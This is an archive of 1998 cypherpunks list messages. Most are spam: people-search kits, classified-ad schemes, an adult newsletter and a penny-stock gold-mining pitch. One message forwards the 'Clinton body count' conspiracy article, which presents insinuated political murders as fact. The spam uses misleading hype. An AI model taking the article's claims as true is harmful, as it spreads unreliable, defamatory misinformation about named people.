-    Global Village 33.6Kbps fax/modem     $45  (Ref: 90day)
-    24x External CD-ROM Drive  $135   (New: 1yr)
-    Apple 166MHz Pentium PC Card     $349   (New: 1yr)
-    Apple MultiScan 15" AV Display     $339    (New: 1yr)
-    PMac 6100 256K L2 Cache Card     $15    (New: 1yr)

To find out more about GALAXY please visit our web site at:  
                        <http://www.galaxyhp.com>

Or, if you have a particular, or immediate interest please
send your email request to <sales@galaxyhp.com>

We accept Mastercard, Visa, American Express, edu. .& gov't
PO's, and welcome international orders.

GALAXY Hardware - 5075 Nectar Way - Eugene OR 97405

541-345-1817  (voice)     541-345-3094  (fax)
+++++++++++


 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anto@commnet.it
Date: Sun, 27 Sep 1998 22:36:45 -0700 (PDT)
To: You@yourplace.com
Subject: Find  Out  Anything  About  Anyone  On  The  Net  !!!!
Message-ID: <199809271544.LAA22172@key.globalx.net>
MIME-Version: 1.0
Content-Type: text/plain



YOU can easily learn how to investigate and learn EVERYTHING 
about your employees, neighbors, friends, enemies, and or
anyone else  !!!


It is absolutely amazing !!!
YOU Must Get This Extraordinary Package today.........


   +  YOU can track down an old friend or a lost love,
     and, just for fun, investigate your family history.

   +  YOU can screen prospective employees criminal records,
     look at their driving, or credit history.

   +  YOU can verify test results from drug testing and even
     look into your children's friends history for any type 
     of record.

   +  YOU can TRACK down and locate an old debtor who is
     hiding from you and see if he/she is hiding any assets.

   +  YOU can look up "unlisted telephone numbers."  Locate
     social security, birth, adoption or death records.
     Check Army, Navy, Marine Corps, or Air Force service
     file records.  YOU will simply be amazed to learn what
     sensitive and important information other people and
     enemies can discover about YOU !!!!!

YOU Can Find Out Anything About Anyone On The Net !!!
Do background checks on people and charge for it, as
you start your own investigative services.
Stop guessing about the LAW !!!
Look up laws and do much more, direct from famous law libraries.
Get this easy to use  KIT  right away, and then,
YOU can become a private investigator.

ORDER TODAY !!!!!


Send $18.00 cash (wrapped in two pieces of paper),
money order, or check to:

                    INFORMATION, Ltd.
                    P. O. Box  515019
                    St. Louis,  MO  63151-5019  USA

The Complete Package Will Be Immediately Shipped
Prepaid Directly to You With Everything You Will Need
In Your Kit to Get Started Right Away !!

THANK YOU for your kind attention, and have a nice day !!!!


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




YOUR AD IN 333 NEWSPAPERS !!!!!!!!!!
***********************************************

         Seven years ago, I learned how to place my Classified Ad in
several hundred newspapers, with just one telephone call.  And, my
cost was $0.51 per newspaper.  The total circulation was well over
1.5 Million.  I could reach just about any market, anywhere in this
country.  Since then, my small mail-order company has exploded.
And, I use this same time tested and true method week after week.

         I would like to share this powerful information and show you
how to save hundreds, even thousands of dollars on advertising that
works.  The average cost of a classified ad in a newspaper is about
$15.00 to $20.00 dollars.  Multiply that by 333 and your total cost is
well over $6,000.00 Dollars.  By using our amazing method, your
total cost is only $170.00.  Not to mention the time and money you
save by placing one call, instead of 333 long distance calls.

          You can limit your promotion to a Single State or place your
ad in Several States around the country, all with just one phone call.
You can reach One Million Readers on the East-Cost today and a
Million on the West-Coast tomorrow.  It's that simple  !!!!

            Your cost for this priceless information, is only $19.00 !!!  
You will make that back on your first promotion.  WE are so confident that
this type of advertising will boost your profits, we will guarantee your
satisfaction with our Money Back Guarantee !!  So, you have nothing
to lose.  Now, order our amazing classified ad method today !!!!!! 


                                PRINT ORDER FORM
Ship To:                    **************************
*********
NAME____________________________________________

ADDRESS________________________________________

CITY______________________________________________

STATE__________________    ZIP_____________________

E-MAIL__________________________________

Don't Delay,   ORDER YOUR COMPLETE MEDIA KIT TODAY !!!!!!!

**********************************************************************
Mail Payment  $19.00  CASH,  money order,  or check  TO:
********************
 
                                  INFORMATION, Ltd.
                                  P. O. Box  515019 
                                  St. Louis, MO 63151-5019  
                                  U.S.A.

WE will ship your complete KIT directly to you !!!!
 

**************************************************************
OPTIONAL / OVERNIGHT SHIPPING - ADD $15.00
**************************************************************
                          
Thank you for your kind attention, and have a nice day !!!


       YOU MAY ORDER BOTH PACKAGE KITS FOR ONLY $33.00



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Admin
Internet Services
This message is not intended for residents in the 
State of Washington, screening of addresses has been done
to the best of our technical ability.
If you are a Washington resident or otherwise wish to be
removed from this list, go to global remove site if you want
your address removed from future mailing. 
http://209.84.246.162/remove.htm
 
This Global Communication has been sent to you by:
PAVILION ADVERTISING SERVICES
Offices:  London, Paris, Berlin, Hong Kong






















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Sun, 27 Sep 1998 10:24:52 -0700 (PDT)
To: edsmith@IntNet.net
Subject: Body Count
Message-ID: <3.0.2.32.19980927132357.00811e40@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


 THURSDAY SEPTEMBER 24, 1998

------------------------------------------
[WorldNetDaily Exclusive]
------------------------------------------

The Clinton 'body count'
New alarm over growing list of dead close to president

By Michael Rivero
Copyright 1998, WorldNetDaily.com

"Dear Sir," began Monica Lewinsky's somewhat peevish letter of July 3rd,
1997.  In it, according to the recently released report by Kenneth Starr,
the former intern chided the president for failing to secure for her a
new White House job, and hinted that continued stalling would result in
word of their affair leaking out.

The next day, Monica confronted Bill Clinton in an Oval Office meeting
she described as "very emotional;" a meeting which ended when the
president warned her, "It's illegal to threaten the president of the
United States."

Three days later, another former White House intern, Mary Mahoney, was
shot five times in the back of the Georgetown Starbuck's she managed. 
Two of her co-workers were also killed.  Even though cash remained in the
register, the triple murder was quickly dismissed as a botched robbery.
No suspects have ever been arrested.

Coincidence?  Maybe.

Former Democratic National Committee fundraiser and Commerce Secretary
Ron Brown was under criminal investigation.  Indictments seemed imminent.
 Ron Brown had reportedly told a confidante that he would, "not go down
alone."  Days later, his plane crashed on approach to Dubrovnik airport
during a trade mission excursion to Croatia.  Military forensics
investigators were alarmed by what appeared to be a .45-caliber bullet
hole in the top of Brown's head.

Coincidence?  Maybe.

Yet another fundraiser was Larry Lawrence, famed for his short residence
at Arlington National Cemetery.  Less well known is that he had been
under criminal investigation by the State Department for three weeks when
he died.

Coincidence?  Maybe.

But for a growing number of Americans, the sheer numbers of strange
deaths surrounding the career of Bill Clinton has begun to raise serious
questions.  In a meeting with Vernon Jordan, Monica Lewinsky reportedly
expressed fears that she might, "end up like Mary Mahoney," and began to
make sure that others knew of her affair with Bill Clinton.

Of all the strange deaths surrounding the Clintons, none has come under
more renewed scrutiny than the fate of White House Deputy Counsel Vincent
Foster, who was found dead in Fort Marcy Park on July 20, 1993.  The
official investigation concluded that Foster inserted a gun into his
mouth and pulled the trigger.  Yet according to the lab results neither
Foster's fingerprints nor blood was on the gun, nor were powder granules
or bullet fragments traceable to that gun in his wounds.  The purported
"suicide note" was found to be a forgery by three independent experts. 
The record of a second wound on Foster's neck, and an FBI memo that
contradicts the official autopsy, strongly suggests that Foster's wounds
were misrepresented in the official report.  The FBI's own records
revealed that deliberate deception was used to link Foster with the gun
found with his body.  Partly on the basis of that evidence, the FBI is
now in federal court on charges of witness harassment and evidence
tampering in the case.

In normal police procedure, homicide is assumed right from the start. 
Suicide must be proven, because homicides are often concealed behind
phony suicides.  Yet in the case of Foster, serious doubts persist
regarding the credibility of the evidence offered up in support of the
claim of suicide, and a recent Zogby Poll revealed that more than
two-thirds of all Americans no longer think the official conclusion of
suicide is believable.

The official conclusion regarding Commerce Secretary Ron Brown's death
was that his plane was brought down by, "the worst storm in a decade." 
However, the Dubrovnik airport weather office, just two miles from the
crash site, could not confirm the existence of any such storm, nor did
any other pilots in the area.  According to the April 8, 1996, Aviation
Week & Space Technology, three separate radio links to the aircraft all
quit while the aircraft was still seven miles from the crash, evidence
that the plane suffered a total electrical failure in flight which was
never investigated.  The perfectly cylindrical hole in Ron Brown's skull
never triggered an autopsy.  After Ron Brown's death, his co-worker,
Barbara Wise, was found locked in her office at the Department of
Commerce, dead, bruised, and partially nude.  Following Brown's death,
John Huang's new boss at Commerce was Charles Meissner, who shortly
thereafter died in yet another plane crash.

These and other questionable deaths have been collected together in a
document known as the "Dead Bodies List," which can now be found in many
locations on the World Wide Web.  Some of the cases are poorly documented
and have been dismissed until now as "conspiracy theory."  However,
analysis of the "Dead Bodies List" by experts on the Internet revealed
that in many cases, deaths whose circumstances demanded an investigation
had been ignored.

Some events officially declared to be accidents seem to stretch the
bounds of credulity.  In one case, Stanley Heard, member of a Clinton
advisory committee and chiropractor to Clinton family members, and his
lawyer Steve Dickson were flying to a meeting with a reporter.  Heard's
private plane caught fire, but he was able to make it back to his airport
and rent another plane to continue his journey.  The rented plane then
caught fire.  This time, Heard did not make it back to the airport. 
Gandy Baugh, attorney for Clinton friend and convicted cocaine
distributor Dan Lasater, fell out of a building.  Baugh's law partner was
dead just one month later.  Jon Parnell Walker, an RTC investigator
looking into Whitewater, interrupted his inspection of his new apartment
to throw himself off of the balcony.

Nor does the pattern of suspicious deaths discriminate by gender.  Susan
Coleman was reportedly a mistress to Clinton while he was Arkansas
attorney general; she was seven months pregnant with what she claimed was
Clinton's child when she died.  Judy Gibbs, a former Penthouse Pet and
call girl, reportedly counted Bill Clinton among her clients.  Shortly
after agreeing to help police in an investigation into Arkansas cocaine
trafficking, Judy burned to death.  Kathy Ferguson, a witness in the
Paula Jones case, was killed with a gunshot behind the ear and was
declared a suicide, even though her suitcases had all been packed for an
immediate trip.  One month later, Bill Shelton, Kathy's boyfriend and a
police officer who had vowed to get to the bottom of Kathy's murder, was
also dead of a gunshot, his body dumped on Kathy's grave.

Another alarming trend observed in these deaths is how society's
safeguards against murder appear to have been compromised.  Many of the
questionable deaths involved either negligence or the complicity of
medical examiners.

Dr. Fahmy Malek was the Arkansas medical examiner under then-Gov. Bill
Clinton.  His most famous case involved his ruling in the "Train Deaths"
case of Don Henry and Kevin Ives in which Dr. Malek ruled that the two
boys had fallen asleep on the railroad tracks and been run over by a
train.  A subsequent autopsy by another examiner found signs of foul play
on both the boys' bodies and concluded that they had been murdered. 
According to Jean Duffey, the prosecutor in the Saline County Drug Task
Force, the two boys accidentally stumbled onto a "protected" drug drop
and were killed for it.  Dan Harmon, the Arkansas investigator who
concluded there was no murder, is now in prison on drug charges.  Despite
the evidence for murder and national exposure, the Henry/Ives case has
never officially been re-opened, and Jean Duffy has since left Arkansas
out of fear for her life.  Several witnesses in the Henry/Ives case later
died and were ruled as either suicides or natural causes by Dr. Malek,
whose willingness to provide an innocuous explanation for these deaths is
illustrated in one case where he claimed that a headless victim had died
of natural causes.  Malek claimed that the victim's small dog had eaten
the head, which was later recovered from a trash bin.  When pressed to
fire Dr. Malek, Gov. Clinton excused the medical examiner's performance
as the result of overwork and gave him a raise.

Dr. Malek's Washington D.C. counterpart was Fairfax, Virginia, Medical
Examiner James C. Beyer.  Long before his autopsy on Vincent Foster,
Beyer's work was disputed.  In the case of Tim Easely, Beyer ignored
obvious defensive wounds, and eyewitness reports of an argument between
Easely and his girlfriend, to conclude that Easely had committed suicide
by stabbing himself in the chest.  When an outside expert called
attention to the fact that Easely had been stabbed clear through one of
his palms, the girlfriend confessed to the murder.  In the case of Tommy
Burkett, Beyer ignored signs of violence done to Burkett to rule it was a
simple suicide.  A subsequent autopsy showed that Beyer had not even done
the work he claimed in his original autopsy.  Even though Beyer showed
X-rays to Burkett's father, Beyer later claimed they did not exist.  When
Beyer performed the Foster autopsy, he wrote in his report that X-rays
had been taken, then again claimed they never existed when asked to
produce them.

In some cases, the deaths simply have no innocuous explanation.  One
witness, Jeff Rhodes (who had information on the Henry/Ives murders) was
found with his hands and feet partly sawn off, shot in the head, then
burned and thrown in a trash bin.  Another obvious murder was Jerry
Parks, Clinton's head of security in Little Rock.  Immediately following
news of Foster's death, Parks reportedly told his family, "Bill Clinton
is cleaning house."  Just weeks after the Parks' home had been broken
into and his files on Clinton stolen, Parks was shot four times in his
car.

Ron Miller, on whose evidence Nora and Gene Lum were convicted of
laundering Clinton campaign donations, went from perfect heath to death
in just one week in a manner so strange that his doctors ordered special
postmortem tests.  The results of those tests have never been released,
but toxicologists familiar with the case suggest that Miller's symptoms
are consistent with Ricin, a cold war assassin's poison.

For a fortunate few the murder attempts have failed.  In the case of
Arkansas drug investigator Russell Welch, his doctors were able to
identify that he had been infected with military anthrax in time to save
his life.  Gary Johnson, Gennifer Flowers' neighbor whose video
surveillance camera had accidentally caught Bill Clinton entering
Flowers' apartment, was left for dead by the men who took the video tape.
 Gary survived, although he is crippled for life.  L.J. Davis, a reporter
looking into the Clinton scandals, was attacked in his hotel room but
survived (his notes on Clinton were stolen).  Dennis Patrick, whose bond
trading account at Dan Lasater's company was used to launder millions of
dollars of drug money, has had four attempts on his life.

But the real importance of the "Dead Bodies List" isn't what it tells us
of modern political intrigues, but what it tells us of ourselves, in how
we respond to it.  The list has been around for quite some time, largely
ignored by the general public, completely ignored by the mainstream
media.  The common reaction has been that such a list is unbelievable,
not for its contents, but for its implications.  For that reason, most
Americans have, until recently, accepted at face value the official
assurances that all these deaths are isolated incidents with no real
meaning; that all the indications of foul play and cover-up are just an
accumulation of clerical error and "overwork;" that it's all just
"coincidence."

On Aug. 17, as Bill Clinton admitted his "inappropriate relationship"
with Monica Lewinsky on nationwide television, Americans began to
confront the unavoidable fact that this president and his administration
had lied to the public about a rather trivial matter.  Americans came to
realize that this president and his administration could no longer safely
be assumed to have told the truth on more serious matters.

In this new climate of doubt, the "Dead Bodies List" has enjoyed a new
vogue, albeit a dark one.  Talk radio discusses it.  Total strangers
e-mail it to each other.  What was unthinkable a few months ago has
become all too plausible.  Political murder has come to America.  Those
cases on the "Dead Bodies List" where hard evidence directly contradicts
the official conclusion have come under renewed scrutiny.

It takes courage for the average citizen to accept that the government
has lied to them, for by doing so, the citizen also accepts the
obligation to do something about it.  Americans know beyond a doubt that
they have been lied to.  Americans are discovering that they cannot
ignore the fact of being lied to without sacrificing that part of the
American self-image that holds honor and justice as ideals.  But as the
above poll would suggest, such a sacrifice is no longer acceptable.

---------------------------------------------------------
[WorldNetDaily.com]
---------------------------------------------------------
(C) 1998 Western Journalism Center
---------------------------------------------------------
This page was last built 9/24/98; 11:51:28
Site: matlanta@mindspring.com

REFERENCES:

A List of Strange Deaths of Individuals Who All Had Verifiable Ties with
Bill Clinton
http://www.devvy.com/death_list.html

VINCE FOSTER FIVE YEARS AFTER
Unsolved Mystery Hampers All Starr's Probes By Carl Limbacher
http://www.esotericworldnews.com/vince.htm

VINCE FOSTER INVESTIGATIONCHRIS RUDDY, (PITTSBURGH TRIBUNE)
http://www.ruddynews.com

Christopher Ruddy's New Web Site <NewsMax.com>
http://www.newsmax.com/insidecover.shtml

Vince Foster - Patrick Knowlton v. FBI Agent Bransford
http://www.monumental.com/lawofcjc/pk/

*** Foster "J'Accuse!"
http://www.angelfire.com/fl/pjcomix/zola1.html

EENIE MENA MINIE MOE...
http://www.esotericworldnews.com/eenie.htm

The Mena Coverup
http://www.esotericworldnews.com/mena.htm

THE "SECRET" CHEMICAL FACTORY THAT NO ONE TRIED TO HIDE
http://www.esotericworldnews.com/london.htm
---------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anto@commnet.it
Date: Mon, 28 Sep 1998 04:28:35 -0700 (PDT)
To: You@yourplace.com
Subject: YOUR  CLASSIFIED - AD / 333  NEWSPAPERS  !!!!
Message-ID: <199809271748.NAA26235@key.globalx.net>
MIME-Version: 1.0
Content-Type: text/plain



YOUR AD IN 333 NEWSPAPERS !!!!!!!!!!
***********************************************

         Seven years ago, I learned how to place my Classified Ad in
several hundred newspapers, with just one telephone call.  And, my
cost was $0.51 per newspaper.  The total circulation was well over
1.5 Million.  I could reach just about any market, anywhere in this
country.  Since then, my small mail-order company has exploded.
And, I use this same time tested and true method week after week.

         I would like to share this powerful information and show you
how to save hundreds, even thousands of dollars on advertising that
works.  The average cost of a classified ad in a newspaper is about
$15.00 to $20.00 dollars.  Multiply that by 333 and your total cost is
well over $6,000.00 Dollars.  By using our amazing method, your
total cost is only $170.00.  Not to mention the time and money you
save by placing one call, instead of 333 long distance calls.

          You can limit your promotion to a Single State or place your
ad in Several States around the country, all with just one phone call.
You can reach One Million Readers on the East-Cost today and a
Million on the West-Coast tomorrow.  It's that simple  !!!!

            Your cost for this priceless information, is only $19.00 !!!  
You will make that back on your first promotion.  WE are so confident that
this type of advertising will boost your profits, we will guarantee your
satisfaction with our Money Back Guarantee !!  So, you have nothing
to lose.  Now, order our amazing classified ad method today !!!!!! 


                                PRINT ORDER FORM
Ship To:                    **************************
*********
NAME____________________________________________

ADDRESS________________________________________

CITY______________________________________________

STATE__________________    ZIP_____________________

E-MAIL__________________________________

Don't Delay,   ORDER YOUR COMPLETE MEDIA KIT TODAY !!!!!!!

**********************************************************************
Mail Payment  $19.00  CASH,  money order,  or check  TO:
********************
 
                                  INFORMATION, Ltd.
                                  P. O. Box  515019 
                                  St. Louis, MO 63151-5019  
                                  U.S.A.

WE will ship your complete KIT directly to you !!!!
 

**************************************************************
OPTIONAL / OVERNIGHT SHIPPING - ADD $15.00
**************************************************************
                          
Thank you for your kind attention, and have a nice day !!!


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


Find Out Anything About Anyone On The Net  !!!
=========================================

YOU can easily learn how to investigate and learn EVERYTHING 
about your employees, neighbors, friends, enemies, and or
anyone else  !!!


It is absolutely amazing !!!
YOU Must Get This Extraordinary Package today.........


   +  YOU can track down an old friend or a lost love,
     and, just for fun, investigate your family history.

   +  YOU can screen prospective employees criminal records,
     look at their driving, or credit history.

   +  YOU can verify test results from drug testing and even
     look into your children's friends history for any type 
     of record.

   +  YOU can TRACK down and locate an old debtor who is
     hiding from you and see if he/she is hiding any assets.

   +  YOU can look up "unlisted telephone numbers."  Locate
     social security, birth, adoption or death records.
     Check Army, Navy, Marine Corps, or Air Force service
     file records.  YOU will simply be amazed to learn what
     sensitive and important information other people and
     enemies can discover about YOU !!!!!

YOU Can Find Out Anything About Anyone On The Net !!!
Do background checks on people and charge for it, as
you start your own investigative services.
Stop guessing about the LAW !!!
Look up laws and do much more, direct from famous law libraries.
Get this easy to use  KIT  right away, and then,
YOU can become a private investigator.

ORDER TODAY !!!!!


Send $18.00 cash (wrapped in two pieces of paper),
money order, or check to:

                    INFORMATION, Ltd.
                    P. O. Box  515019
                    St. Louis, MO  63151-5019  USA

The Complete Package Will Be Immediately Shipped
Prepaid Directly to You With Everything You Will Need
In Your Kit to Get Started Right Away !!

THANK YOU for your kind attention, and have a nice day !!!!


       YOU MAY ORDER BOTH PACKAGE KITS FOR ONLY $33.00


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Admin
Internet Services
This message is not intended for residents in the 
State of Washington, screening of addresses has been done
to the best of our technical ability.
If you are a Washington resident or otherwise wish to be
removed from this list, go to global remove site if you want
your address removed from future mailing. 
http://209.84.246.162/remove.htm
 
This Global Communication has been sent to you by:
PAVILION INTERNATIONAL SERVICES
Offices:  London, Paris, Berlin, Hong Kong


















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anto@commnet.it
Date: Wed, 30 Sep 1998 00:33:05 -0700 (PDT)
To: You@yourplace.com
Subject: Find  Out  Anything  About  Anyone  On  The  Net  !!!!
Message-ID: <199809272208.SAA08331@sampson.cbn.org>
MIME-Version: 1.0
Content-Type: text/plain



YOU can easily learn how to investigate and learn EVERYTHING 
about your employees, neighbors, friends, enemies, and or
anyone else  !!!


It is absolutely amazing !!!
YOU Must Get This Extraordinary Package today.........


   +  YOU can track down an old friend or a lost love,
     and, just for fun, investigate your family history.

   +  YOU can screen prospective employees criminal records,
     look at their driving, or credit history.

   +  YOU can verify test results from drug testing and even
     look into your children's friends history for any type 
     of record.

   +  YOU can TRACK down and locate an old debtor who is
     hiding from you and see if he/she is hiding any assets.

   +  YOU can look up "unlisted telephone numbers."  Locate
     social security, birth, adoption or death records.
     Check Army, Navy, Marine Corps, or Air Force service
     file records.  YOU will simply be amazed to learn what
     sensitive and important information other people and
     enemies can discover about YOU !!!!!

YOU Can Find Out Anything About Anyone On The Net !!!
Do background checks on people and charge for it, as
you start your own investigative services.
Stop guessing about the LAW !!!
Look up laws and do much more, direct from famous law libraries.
Get this easy to use  KIT  right away, and then,
YOU can become a private investigator.

ORDER TODAY !!!!!


Send $18.00 cash (wrapped in two pieces of paper),
money order, or check to:

                    INFORMATION, Ltd.
                    P. O. Box  515019
                    St. Louis,  MO  63151-5019  USA

The Complete Package Will Be Immediately Shipped
Prepaid Directly to You With Everything You Will Need
In Your Kit to Get Started Right Away !!

THANK YOU for your kind attention, and have a nice day !!!!


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




YOUR AD IN 333 NEWSPAPERS !!!!!!!!!!
***********************************************

         Seven years ago, I learned how to place my Classified Ad in
several hundred newspapers, with just one telephone call.  And, my
cost was $0.51 per newspaper.  The total circulation was well over
1.5 Million.  I could reach just about any market, anywhere in this
country.  Since then, my small mail-order company has exploded.
And, I use this same time tested and true method week after week.

         I would like to share this powerful information and show you
how to save hundreds, even thousands of dollars on advertising that
works.  The average cost of a classified ad in a newspaper is about
$15.00 to $20.00 dollars.  Multiply that by 333 and your total cost is
well over $6,000.00 Dollars.  By using our amazing method, your
total cost is only $170.00.  Not to mention the time and money you
save by placing one call, instead of 333 long distance calls.

          You can limit your promotion to a Single State or place your
ad in Several States around the country, all with just one phone call.
You can reach One Million Readers on the East-Cost today and a
Million on the West-Coast tomorrow.  It's that simple  !!!!

            Your cost for this priceless information, is only $19.00 !!!  
You will make that back on your first promotion.  WE are so confident that
this type of advertising will boost your profits, we will guarantee your
satisfaction with our Money Back Guarantee !!  So, you have nothing
to lose.  Now, order our amazing classified ad method today !!!!!! 


                                PRINT ORDER FORM
Ship To:                    **************************
*********
NAME____________________________________________

ADDRESS________________________________________

CITY______________________________________________

STATE__________________    ZIP_____________________

E-MAIL__________________________________

Don't Delay,   ORDER YOUR COMPLETE MEDIA KIT TODAY !!!!!!!

**********************************************************************
Mail Payment  $19.00  CASH,  money order,  or check  TO:
********************
 
                                  INFORMATION, Ltd.
                                  P. O. Box  515019 
                                  St. Louis, MO 63151-5019  
                                  U.S.A.

WE will ship your complete KIT directly to you !!!!
 

**************************************************************
OPTIONAL / OVERNIGHT SHIPPING - ADD $15.00
**************************************************************
                          
Thank you for your kind attention, and have a nice day !!!


       YOU MAY ORDER BOTH PACKAGE KITS FOR ONLY $33.00



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Admin
Internet Services
This message is not intended for residents in the 
State of Washington, screening of addresses has been done
to the best of our technical ability.
If you are a Washington resident or otherwise wish to be
removed from this list, go to global remove site if you want
your address removed from future mailing. 
http://209.84.246.162/remove.htm
 
This Global Communication has been sent to you by:
PAVILION ADVERTISING SERVICES
Offices:  London, Paris, Berlin, Hong Kong






















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Mon, 28 Sep 1998 03:52:30 -0700 (PDT)
To: (STUFFED MONDAY SEPTEMBER 28 1998)
Subject: TODAY'S NEWS AND PICS PACKED STUFFED! - READ IT NOW!
Message-ID: <19980928071000.25042.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ 30 FREE HOT JPEG PHOTOS
+ 5 SUPER SEXY STORIES
+ NOTES ON MARRIAGE
+ SUCKING AND FLOPPING
+ MADONNA GOES ALL GIRL
+ THE BEST OF EUREKA
+ KEEP IT COMING MONICA
+ TOP 9 SIGNS GRAMPS IS ON VIAGRA
+ NO PLACE TO HIDE AT THE NAKED LUNCH
+ I LOVE PAPAYA

       ---->   http://stuffed.net/98/9/28/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/28/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bluesky17@mailexcite.com
Date: Tue, 29 Sep 1998 08:09:57 -0700 (PDT)
To: <gnu@toad.com>
Subject: GOLD IN BOLIVIA
Message-ID: <199809291509.IAA12218@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



INTRODUCTION

SUN RIVER MINING, INC. offers investors an incredible 
ground-floor
investment opportunity in a company that is slated to begin 
producing 
gold during 1999 at a cash cost of less than US$100 per ounce!

Sun River Mining went public in September and trades on the 
NASDAQ OTC 
electronic bulletin board under the symbol "SUNR".  Sun River 
Mining is 
tightly-held (insiders hold 7.8 million shares), has a limited 
float 
(approximately 1.5 million shares) and is not very widely known.

The Company's primary business is the acquisition, exploration 
and
development of placer gold projects in Bolivia, with the goal of 
becoming 
Bolivia's largest and lowest-cost alluvial gold producer.  The 
management 
team has over 60 years of placer mining experience.


THE COMPANY

Sun River Mining, through its Bolivian subsidiary, North Bolivian
Investment S.A. has entered into a Letter of Understanding 
Agreement 
with Aluvion S.A. and its shareholders to acquire up to an 81% 
equity 
interest in Aluvion, which is a Bolivian company holding mineral 
concessions in the Tipuani River basin.  Aluvion management  has 
extensive dredging experience in alluvial / placer gold prospects 
and 
owns hydraulic excavation equipment.

The Company has obtained a report on the Tipuani River prospects 
of 
Aluvion from the respected mining and engineering firm in Denver, 
Colorado of Watts, Griffis & McOuat, Limited ("WGM").  The Report 
concluded that "there are indeed significant volumes of unmined 
uriferous gravels to justify interest in establishing commercial 
operations based on these deposits." WGM recommended 
additional drilling of prospects for evaluation purposes,
and that negotiations to reduce royalty interests in the 
concessions begin.

The company is currently seeking funding sources and / or 
oint venture partners to provide capital for the pursuit of the 
Aluvion S.A.opportunities.  The Letter of Understanding Agreement 
requires aggregate payments of $7,189,000 to complete a 74.324% 
equity interest acquisition of Aluvion, of which over $400,00 has 
been 
advanced to Aluvion with $5.57 million due January 31, 1999 and a 
further 
$1.2 million to be paid out of production.  Further, $2.5 million 
additional 
paid in capital would increase SUNR's equity interest in Aluvion 
to 81%.  
There are on-going negotiations with several financing sources; 
however, 
the Company has not received a binding commitment for such funds 
at this 
time, nor are there guarantees or assurances that such a 
financing can be 
arranged on terms acceptable to Sun River Mining.

Sun River Mining's Denver-area location allows it to tap into a 
wealth of local 
technical, financial and operational expertise.  Other 
Colorado-based firms with 
major property positions as well as operating and developing 
mines in Bolivia 
include:  Orvana Resources (developing the Don Mario and Pederson 
gold projects), 
Granges, Inc. (undertaking feasibility studies on the Capa Circa 
and Amayapampa 
deposits), and Golden Eagle International.


MANAGEMENT

Among operating companies, a key component of success is the 
experience of the 
management team.

If Sun River Mining acquires Aluvion S.A., it will have the 
benefit of
Gaston Fernandez (currently the President of Aluvion) who has 45 
years 
of mining experience, mostly in dredging operations in South 
America.  
Mr. Fernandez was Chief Engineer on the Kaka River dredge 
operated 
by South America Placers, Inc. from 1957 - 1965, using the same 
dredge 
that Sun River Mining / Aluvion intends to acquire, refurbish and 
use 
on the Tipuani & Kaka River projects.  His son, Marcelo 
Fernandez, is 
a mining engineer with over 20 years of placer mining experience 
(a graduate 
of the Colorado School of Mines), who is employed by Aluvion as 
technical 
and operations manager for the Lower Tipuani and Kaka River gold 
projects.


THE PROSPECTS

Lower Tipuani.  The Lower Tipuani prospects cover approximately 8 
km along 
the Tipuani River between the towns of Guanay and Tipuani. Guanay 
is located 
105 kilometers north of LaPaz, Bolivia, and is connected with 
LaPaz by a 230-km 
paved, gravel and dirt road (a new paved road is under 
construction).

In the Lower Tipuani area, the river is 30 to 60 meters wide and 
up to 10 meters deep.  
All of the necessary infrastructure is in place, including a 
100-man base camp, 
access roads and high voltage hydroelectric power lines.

An environmental impact study has been completed and approved by 
the Bolivian government.  
The one remaining permit necessary to begin construction, the 
"environmental 
operating license", takes about 60 days to receive (Aluvion needs 
to provide 
Bolivian government with information on the equipment to be used 
and a schedule 
for the exploitation phase).

Planned mining operations would involve dredging, washing and 
filtering river 
gravels to recover free particles of gold and produce dore bars 
(> 95% Au).  With no 
chemical processes involved, mining and processing operations do 
not pose the 
risk of introducing into the environment the chemicals used to 
recover gold by 
many other mining projects.

The Lower Tipuani alluvials would be mined out over a four-year 
span (1999 - 2002).  
During this period, Aluvion projects recovering over 257,000 
ounces of gold, or 
an average of 64,300 ounces per year.  Cash operating costs are 
estimated at US$93 
per ounce (these projections have been reviewed by Watts, Griffis 
& McOuat).

Kaka River.  Subject to financing, operations are currently 
projected to begin in 
the year 2000; gravel deposits, if economically producable, could 
last for an 
estimated minimum 20 year mine life (this prospect is not subject 
to seasonal 
shutdowns during the rainy season).

Sun River Mining / Rio Del Sol have entered into a letter of 
intent with
Central Cooperative Teoponte, which represents nine local 
cooperatives 
operating along the Kaka River.  Subject to funding and 
performance requirements, 
the Kaka River properties are expected to be acquired in return 
for a production 
royalty (no cash / shares / debt).

NEW LISTING ("SUNR" on OTC:BB)

GOLD PRODUCTION PROJECTED TO BEGIN IN 1999

PROJECTED ANNUAL PRODUCTION OF > 150,000 oz/yr @ US$96/oz

FOR MORE INFORMATION CONTACT:

SUN RIVER MINING, INC.
Suite  201    5353 Manhattan Circle
Boulder, Colorado  80303  USA

Phone: (303) 543 - 8434    

